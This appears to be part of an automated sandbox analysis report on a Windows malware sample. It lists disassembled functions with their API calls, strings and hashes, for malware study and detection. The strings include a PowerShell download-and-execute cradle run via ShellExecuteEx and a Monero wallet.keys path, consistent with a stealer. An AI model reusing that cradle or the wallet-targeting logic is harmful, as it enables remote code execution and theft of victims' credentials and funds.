                            • RtlAllocateHeap.NTDLL(00000000), ref: 0068773B
                            • RegOpenKeyExA.ADVAPI32(80000002,012ABD70,00000000,00020119,006876B9), ref: 0068775B
                            • RegQueryValueExA.ADVAPI32(006876B9,CurrentBuildNumber,00000000,00000000,?,000000FF), ref: 0068777A
                            • RegCloseKey.ADVAPI32(006876B9), ref: 00687784
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1366369367.0000000000671000.00000040.00000001.01000000.00000003.sdmp, Offset: 00670000, based on PE: true
                            • Associated: 00000000.00000002.1366348513.0000000000670000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366369367.0000000000721000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366369367.000000000072D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366369367.0000000000752000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366369367.00000000008BA000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366641315.00000000008CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366641315.0000000000A59000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366641315.0000000000B2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366641315.0000000000B51000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366641315.0000000000B5C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366641315.0000000000B6A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1367399051.0000000000B6B000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1367500286.0000000000D07000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1367516409.0000000000D08000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_670000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Heap$AllocateCloseOpenProcessQueryValue
                            • String ID: CurrentBuildNumber
                            • API String ID: 3225020163-1022791448
                            • Opcode ID: 470089ea50ed2a7fc9583e3a0b971923489869367719520c5e38a7b1e1a07402
                            • Instruction ID: 1431571298b3cf25685074d7ccf68a0d4ac56fbcacb8ce336958d83fc10f2f38
                            • Opcode Fuzzy Hash: 470089ea50ed2a7fc9583e3a0b971923489869367719520c5e38a7b1e1a07402
                            • Instruction Fuzzy Hash: 590167B5A40308BFDB04DBE4DC49FAEB7BCFB48701F104258FA05A7281DA705500CB51
                            Function 006892E0 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 39fileCOMMON
                            Download Yara Rule
                            APIs
                            • CreateFileA.KERNEL32(:h,80000000,00000003,00000000,00000003,00000080,00000000,?,00683AEE,?), ref: 006892FC
                            • GetFileSizeEx.KERNEL32(000000FF,:h), ref: 00689319
                            • CloseHandle.KERNEL32(000000FF), ref: 00689327
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1366369367.0000000000671000.00000040.00000001.01000000.00000003.sdmp, Offset: 00670000, based on PE: true
                            • Associated: 00000000.00000002.1366348513.0000000000670000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366369367.0000000000721000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366369367.000000000072D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366369367.0000000000752000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366369367.00000000008BA000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366641315.00000000008CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366641315.0000000000A59000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366641315.0000000000B2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366641315.0000000000B51000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366641315.0000000000B5C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366641315.0000000000B6A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1367399051.0000000000B6B000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1367500286.0000000000D07000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1367516409.0000000000D08000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_670000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: File$CloseCreateHandleSize
                            • String ID: :h$:h
                            • API String ID: 1378416451-1831227254
                            • Opcode ID: 2220ffe936f8bf669aa74def050988227801ae1cef8e3a09f687843e5d47ee8c
                            • Instruction ID: 9758bf300d523cd9adc3221c8bb084cc886864d85e028c45487cd2adffe64c80
                            • Opcode Fuzzy Hash: 2220ffe936f8bf669aa74def050988227801ae1cef8e3a09f687843e5d47ee8c
                            • Instruction Fuzzy Hash: F7F03C75E44208BBDB14EBB0DC49BAE77FABB58710F108394B651A72C0DA7196018F94
                            Function 006840B0 Relevance: 9.1, APIs: 6, Instructions: 124registrystringCOMMON
                            Download Yara Rule
                            APIs
                            • memset.MSVCRT ref: 006840D5
                            • RegOpenKeyExA.ADVAPI32(80000001,012BDE80,00000000,00020119,?), ref: 006840F4
                            • RegQueryValueExA.ADVAPI32(?,012BEA90,00000000,00000000,00000000,000000FF), ref: 00684118
                            • RegCloseKey.ADVAPI32(?), ref: 00684122
                            • lstrcat.KERNEL32(?,00000000), ref: 00684147
                            • lstrcat.KERNEL32(?,012BE8B0), ref: 0068415B
                            Memory Dump Source
                            • Source File: 00000000.00000002.1366369367.0000000000671000.00000040.00000001.01000000.00000003.sdmp, Offset: 00670000, based on PE: true
                            • Associated: 00000000.00000002.1366348513.0000000000670000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366369367.0000000000721000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366369367.000000000072D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366369367.0000000000752000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366369367.00000000008BA000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366641315.00000000008CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366641315.0000000000A59000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366641315.0000000000B2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366641315.0000000000B51000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366641315.0000000000B5C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366641315.0000000000B6A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1367399051.0000000000B6B000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1367500286.0000000000D07000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1367516409.0000000000D08000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_670000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcat$CloseOpenQueryValuememset
                            • String ID:
                            • API String ID: 2623679115-0
                            • Opcode ID: 4db77052385a3add2607e532c6fc89f15756579c05b892af1358bbade609fad2
                            • Instruction ID: b95e89dc799a87573b9559c5150912aa3de440986917805e150a0fcd7f840232
                            • Opcode Fuzzy Hash: 4db77052385a3add2607e532c6fc89f15756579c05b892af1358bbade609fad2
                            • Instruction Fuzzy Hash: 3B41AAB6D001086BDB58FBA4DC56FFE733EBB48300F40865DB61A57181EE755B888B92
                            Function 006799C0 Relevance: 9.1, APIs: 6, Instructions: 82filememoryCOMMON
                            Download Yara Rule
                            APIs
                            • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 006799EC
                            • GetFileSizeEx.KERNEL32(000000FF,?), ref: 00679A11
                            • LocalAlloc.KERNEL32(00000040,?), ref: 00679A31
                            • ReadFile.KERNEL32(000000FF,?,00000000,0067148F,00000000), ref: 00679A5A
                            • LocalFree.KERNEL32(0067148F), ref: 00679A90
                            • CloseHandle.KERNEL32(000000FF), ref: 00679A9A
                            Memory Dump Source
                            • Source File: 00000000.00000002.1366369367.0000000000671000.00000040.00000001.01000000.00000003.sdmp, Offset: 00670000, based on PE: true
                            • Associated: 00000000.00000002.1366348513.0000000000670000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366369367.0000000000721000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366369367.000000000072D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366369367.0000000000752000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366369367.00000000008BA000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366641315.00000000008CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366641315.0000000000A59000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366641315.0000000000B2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366641315.0000000000B51000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366641315.0000000000B5C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366641315.0000000000B6A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1367399051.0000000000B6B000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1367500286.0000000000D07000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1367516409.0000000000D08000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_670000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: File$Local$AllocCloseCreateFreeHandleReadSize
                            • String ID:
                            • API String ID: 2311089104-0
                            • Opcode ID: a7b196a23964c8ee470425c7b0e2a44471a252647ed3253c997a8c7a61132b28
                            • Instruction ID: 31f31e1a772d6f0b417ced7894c976b071020fd0a7a44a99fbf0fad27889fe6e
                            • Opcode Fuzzy Hash: a7b196a23964c8ee470425c7b0e2a44471a252647ed3253c997a8c7a61132b28
                            • Instruction Fuzzy Hash: E131E1B4A01209EFDB14CFA4C885BAE77F6BF48310F108258E915A7390D779AA41CFA1
                            Function 0068C84E Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 129COMMONLIBRARYCODE
                            Download Yara Rule
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1366369367.0000000000671000.00000040.00000001.01000000.00000003.sdmp, Offset: 00670000, based on PE: true
                            • Associated: 00000000.00000002.1366348513.0000000000670000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366369367.0000000000721000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366369367.000000000072D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366369367.0000000000752000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366369367.00000000008BA000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366641315.00000000008CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366641315.0000000000A59000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366641315.0000000000B2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366641315.0000000000B51000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366641315.0000000000B5C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366641315.0000000000B6A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1367399051.0000000000B6B000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1367500286.0000000000D07000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1367516409.0000000000D08000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_670000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: String___crt$Typememset
                            • String ID:
                            • API String ID: 3530896902-3916222277
                            • Opcode ID: e2a63e0e5ec08ead939fd5066081de7be62dbae43d7ed3e92ad1a520edfa41ba
                            • Instruction ID: 6913038a59546fb63a4ba64a90be274f35cc55f16c8d47eb8e8141ff8fbb6164
                            • Opcode Fuzzy Hash: e2a63e0e5ec08ead939fd5066081de7be62dbae43d7ed3e92ad1a520edfa41ba
                            • Instruction Fuzzy Hash: 224115B110079C5EDF21AB248C84FFBBBFA9B45714F1445ECE98A86182E2719A45DF34
                            Function 00684780 Relevance: 8.9, APIs: 7, Instructions: 101stringCOMMON
                            Download Yara Rule
                            APIs
                            • lstrcat.KERNEL32(?,012BEB38), ref: 006847DB
                              • Part of subcall function 00688DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00688E0B
                            • lstrcat.KERNEL32(?,00000000), ref: 00684801
                            • lstrcat.KERNEL32(?,?), ref: 00684820
                            • lstrcat.KERNEL32(?,?), ref: 00684834
                            • lstrcat.KERNEL32(?,012AA938), ref: 00684847
                            • lstrcat.KERNEL32(?,?), ref: 0068485B
                            • lstrcat.KERNEL32(?,012BDD20), ref: 0068486F
                              • Part of subcall function 0068A740: lstrcpy.KERNEL32(00690E17,00000000), ref: 0068A788
                              • Part of subcall function 00688D90: GetFileAttributesA.KERNEL32(00000000,?,00671B54,?,?,0069564C,?,?,00690E1F), ref: 00688D9F
                              • Part of subcall function 00684570: GetProcessHeap.KERNEL32(00000000,0098967F), ref: 00684580
                              • Part of subcall function 00684570: RtlAllocateHeap.NTDLL(00000000), ref: 00684587
                              • Part of subcall function 00684570: wsprintfA.USER32 ref: 006845A6
                              • Part of subcall function 00684570: FindFirstFileA.KERNEL32(?,?), ref: 006845BD
                            Memory Dump Source
                            • Source File: 00000000.00000002.1366369367.0000000000671000.00000040.00000001.01000000.00000003.sdmp, Offset: 00670000, based on PE: true
                            • Associated: 00000000.00000002.1366348513.0000000000670000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366369367.0000000000721000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366369367.000000000072D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366369367.0000000000752000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366369367.00000000008BA000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366641315.00000000008CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366641315.0000000000A59000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366641315.0000000000B2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366641315.0000000000B51000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366641315.0000000000B5C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366641315.0000000000B6A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1367399051.0000000000B6B000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1367500286.0000000000D07000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1367516409.0000000000D08000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_670000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcat$FileHeap$AllocateAttributesFindFirstFolderPathProcesslstrcpywsprintf
                            • String ID:
                            • API String ID: 2540262943-0
                            • Opcode ID: fb7a98f2d50d8ae03482984586ae4df806bd95465134c5d1aa4d18746a5bab17
                            • Instruction ID: 9f334b1be6d1a89f3163855979df138b4e8f1b10c8851e5187a86122ffc3c981
                            • Opcode Fuzzy Hash: fb7a98f2d50d8ae03482984586ae4df806bd95465134c5d1aa4d18746a5bab17
                            • Instruction Fuzzy Hash: EB315FB2900208ABDB54FBB0DC85EE9737DBB58700F40469DB71996081EE749789CB9A
                            Function 00682C90 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 99COMMON
                            Download Yara Rule
                            APIs
                              • Part of subcall function 0068A740: lstrcpy.KERNEL32(00690E17,00000000), ref: 0068A788
                              • Part of subcall function 0068A9B0: lstrlen.KERNEL32(?,012B8BB8,?,\Monero\wallet.keys,00690E17), ref: 0068A9C5
                              • Part of subcall function 0068A9B0: lstrcpy.KERNEL32(00000000), ref: 0068AA04
                              • Part of subcall function 0068A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0068AA12
                              • Part of subcall function 0068A920: lstrcpy.KERNEL32(00000000,?), ref: 0068A972
                              • Part of subcall function 0068A920: lstrcat.KERNEL32(00000000), ref: 0068A982
                              • Part of subcall function 0068A8A0: lstrcpy.KERNEL32(?,00690E17), ref: 0068A905
                            • ShellExecuteEx.SHELL32(0000003C), ref: 00682D85
                            Strings
                            • ')", xrefs: 00682CB3
                            • -nop -c "iex(New-Object Net.WebClient).DownloadString(', xrefs: 00682CC4
                            • <, xrefs: 00682D39
                            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, xrefs: 00682D04
                            Memory Dump Source
                            • Source File: 00000000.00000002.1366369367.0000000000671000.00000040.00000001.01000000.00000003.sdmp, Offset: 00670000, based on PE: true
                            • Associated: 00000000.00000002.1366348513.0000000000670000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366369367.0000000000721000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366369367.000000000072D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366369367.0000000000752000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366369367.00000000008BA000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366641315.00000000008CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366641315.0000000000A59000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366641315.0000000000B2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366641315.0000000000B51000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366641315.0000000000B5C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366641315.0000000000B6A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1367399051.0000000000B6B000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1367500286.0000000000D07000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1367516409.0000000000D08000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_670000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpy$lstrcat$ExecuteShelllstrlen
                            • String ID: ')"$-nop -c "iex(New-Object Net.WebClient).DownloadString('$<$C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                            • API String ID: 3031569214-898575020
                            • Opcode ID: 08e9121092a3011796adfbe5aaa36226bafb95b47025d01f8e5ff4f8508cc020
                            • Instruction ID: 24c3b02f62939e50a9ff176296b3c73332c7aefb4260c247cbe8005a1840d4d0
                            • Opcode Fuzzy Hash: 08e9121092a3011796adfbe5aaa36226bafb95b47025d01f8e5ff4f8508cc020
                            • Instruction Fuzzy Hash: 6C41CD718102089AEF58FBE0C891BDDB77AAF14300F40425EE416B7191DF786A4ACFA9
                            Function 00679E10 Relevance: 7.7, APIs: 1, Strings: 4, Instructions: 170memoryCOMMON
                            Download Yara Rule
                            APIs
                            • LocalAlloc.KERNEL32(00000040,?), ref: 00679F41
                              • Part of subcall function 0068A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0068A7E6
                              • Part of subcall function 0068A740: lstrcpy.KERNEL32(00690E17,00000000), ref: 0068A788
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1366369367.0000000000671000.00000040.00000001.01000000.00000003.sdmp, Offset: 00670000, based on PE: true
                            • Associated: 00000000.00000002.1366348513.0000000000670000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366369367.0000000000721000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366369367.000000000072D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366369367.0000000000752000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366369367.00000000008BA000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366641315.00000000008CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366641315.0000000000A59000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366641315.0000000000B2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366641315.0000000000B51000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366641315.0000000000B5C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366641315.0000000000B6A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1367399051.0000000000B6B000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1367500286.0000000000D07000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1367516409.0000000000D08000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_670000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpy$AllocLocal
                            • String ID: @$ERROR_RUN_EXTRACTOR$v10$v20
                            • API String ID: 4171519190-1096346117
                            • Opcode ID: e0f2638334e8c565637f6cce13765c1d9488e58401af799626b73eeea4002c65
                            • Instruction ID: 35691a7acc4d9d3f00714df054b51a81eccafa05dfd0fcca1e79446df8c0af05
                            • Opcode Fuzzy Hash: e0f2638334e8c565637f6cce13765c1d9488e58401af799626b73eeea4002c65
                            • Instruction Fuzzy Hash: 28616F709002089FEB28EFA4CD96FED777AAF40304F008518F90E5F581EB746A46CB96
                            Function 006870D0 Relevance: 7.6, APIs: 2, Strings: 3, Instructions: 140COMMON
                            Download Yara Rule
                            APIs
                              • Part of subcall function 0068A740: lstrcpy.KERNEL32(00690E17,00000000), ref: 0068A788
                            • memset.MSVCRT ref: 0068716A
                            Strings
                            • sh, xrefs: 00687111
                            • sh, xrefs: 006872AE, 00687179, 0068717C
                            • 65 79 41 69 64 48 6C 77 49 6A 6F 67 49 6B 70 58 56 43 49 73 49 43 4A 68 62 47 63 69 4F 69 41 69 52 57 52 45 55 30 45 69 49 48 30, xrefs: 0068718C
                            Memory Dump Source
                            • Source File: 00000000.00000002.1366369367.0000000000671000.00000040.00000001.01000000.00000003.sdmp, Offset: 00670000, based on PE: true
                            • Associated: 00000000.00000002.1366348513.0000000000670000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366369367.0000000000721000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366369367.000000000072D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366369367.0000000000752000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366369367.00000000008BA000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366641315.00000000008CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366641315.0000000000A59000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366641315.0000000000B2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366641315.0000000000B51000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366641315.0000000000B5C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366641315.0000000000B6A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1367399051.0000000000B6B000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1367500286.0000000000D07000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1367516409.0000000000D08000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_670000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpymemset
                            • String ID: sh$sh$65 79 41 69 64 48 6C 77 49 6A 6F 67 49 6B 70 58 56 43 49 73 49 43 4A 68 62 47 63 69 4F 69 41 69 52 57 52 45 55 30 45 69 49 48 30
                            • API String ID: 4047604823-824928704
                            • Opcode ID: 077866c952417ddc83c2d2049b02c23b1ab90a7e51095683ea2187a8191dc9d1
                            • Instruction ID: 99e9c8a14fd5053361fb5184fe799dc8b35f9c6322c7697536325412f0646ecc
                            • Opcode Fuzzy Hash: 077866c952417ddc83c2d2049b02c23b1ab90a7e51095683ea2187a8191dc9d1
                            • Instruction Fuzzy Hash: D2518EB0C042189BDB64EB90DC95BEEB776AF54300F2442ADE61562281EB746E88CF59
                            Function 00687E00 Relevance: 7.6, APIs: 5, Instructions: 58registrymemoryCOMMON
                            Download Yara Rule
                            APIs
                            • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00687E37
                            • RtlAllocateHeap.NTDLL(00000000), ref: 00687E3E
                            • RegOpenKeyExA.ADVAPI32(80000002,012AB980,00000000,00020119,?), ref: 00687E5E
                            • RegQueryValueExA.ADVAPI32(?,012BDE00,00000000,00000000,000000FF,000000FF), ref: 00687E7F
                            • RegCloseKey.ADVAPI32(?), ref: 00687E92
                            Memory Dump Source
                            • Source File: 00000000.00000002.1366369367.0000000000671000.00000040.00000001.01000000.00000003.sdmp, Offset: 00670000, based on PE: true
                            • Associated: 00000000.00000002.1366348513.0000000000670000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366369367.0000000000721000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366369367.000000000072D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366369367.0000000000752000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366369367.00000000008BA000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366641315.00000000008CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366641315.0000000000A59000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366641315.0000000000B2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366641315.0000000000B51000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366641315.0000000000B5C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1366641315.0000000000B6A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1367399051.0000000000B6B000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1367500286.0000000000D07000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1367516409.0000000000D08000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_670000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Heap$AllocateCloseOpenProcessQueryValue
                            • String ID:
                            • API String ID: 3225020163-0
                            • Opcode ID: f4145b372c6bf101d687e913939e6eaa7ad8511d712086483488da6e58f042cc
                            • Instruction ID: 9e3463f1b52fd5d276c4579b8e7173bbeb320772ab3ea57762f4c748b5c01d27
                            • Opcode Fuzzy Hash: f4145b372c6bf101d687e913939e6eaa7ad8511d712086483488da6e58f042cc
                            • Instruction Fuzzy Hash: B2115EB1A44205EBD718DF94DD49FBBBBBDFB04B10F204259F615A7680D77468018BA1
